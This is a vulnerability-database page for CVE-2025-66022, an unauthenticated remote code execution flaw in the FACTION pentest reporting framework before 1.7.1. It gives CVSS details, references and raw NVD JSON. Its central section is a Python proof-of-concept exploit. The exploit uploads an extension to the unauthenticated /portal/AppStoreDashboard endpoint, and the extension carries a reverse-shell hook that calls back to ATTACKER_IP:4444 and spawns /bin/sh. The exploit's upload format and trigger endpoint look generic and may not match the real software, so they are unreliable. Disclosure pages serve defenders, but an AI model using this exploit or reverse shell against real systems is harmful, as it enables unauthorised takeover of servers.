Security Vulnerability Report
CVE-2025-66022 CVSS 9.6 CRITICAL

CVE-2025-66022

Published: 2025-11-26 03:15:58
Last Modified: 2026-01-02 19:13:00

Description

FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction’s extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:owasp:faction:*:*:*:*:*:*:*:* - VULNERABLE
FACTION < 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66022 PoC - FACTION RCE via Malicious Extension
# Target: FACTION < 1.7.1

TARGET = "http://target:5000"
ATTACKER_IP = "attacker_ip"
ATTACKER_PORT = "4444"


def create_malicious_extension():
    """
    Create a malicious FACTION extension with reverse shell payload
    """
    malicious_hook = f'''
import subprocess
import socket
import os

def on_load():
    # Reverse shell payload
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("{ATTACKER_IP}", {ATTACKER_PORT}))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])
'''

    extension_manifest = {
        "name": "malicious_extension",
        "version": "1.0.0",
        "description": "Malicious extension for CVE-2025-66022",
        "hooks": {
            "on_load": malicious_hook
        }
    }

    return extension_manifest


def exploit():
    """
    Exploit the unauthenticated extension upload vulnerability
    """
    # Step 1: Access the vulnerable endpoint without authentication
    upload_url = f"{TARGET}/portal/AppStoreDashboard"

    # Step 2: Upload malicious extension
    files = {
        'extension': ('malicious.zip', json.dumps(create_malicious_extension()), 'application/json')
    }

    print("[*] Uploading malicious extension...")
    response = requests.post(upload_url, files=files)

    if response.status_code == 200:
        print("[+] Extension uploaded successfully!")
        print("[*] Triggering the malicious hook...")

        # Step 3: Trigger the hook to execute the payload
        trigger_url = f"{TARGET}/portal/extensions/trigger"
        requests.post(trigger_url, data={'extension': 'malicious_extension'})
        print("[+] Payload triggered!")
    else:
        print("[-] Upload failed!")
        print(f"[*] Response: {response.text}")


if __name__ == "__main__":
    print("CVE-2025-66022 FACTION RCE Exploit")
    print("Target: " + TARGET)
    exploit()

References

https://github.com/factionsecurity/faction/commit/c6389f1c76175b7c1c68d1a87b389311b16c62c3 (Patch)
https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66022", "sourceIdentifier": "[email protected]", "published": "2025-11-26T03:15:57.910", "lastModified": "2026-01-02T19:13:00.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction’s extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-829"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:owasp:faction:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "BB66953C-3E5C-440D-A5D3-AB7D6FC34265"}]}]}], "references": [{"url": "https://github.com/factionsecurity/faction/commit/c6389f1c76175b7c1c68d1a87b389311b16c62c3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}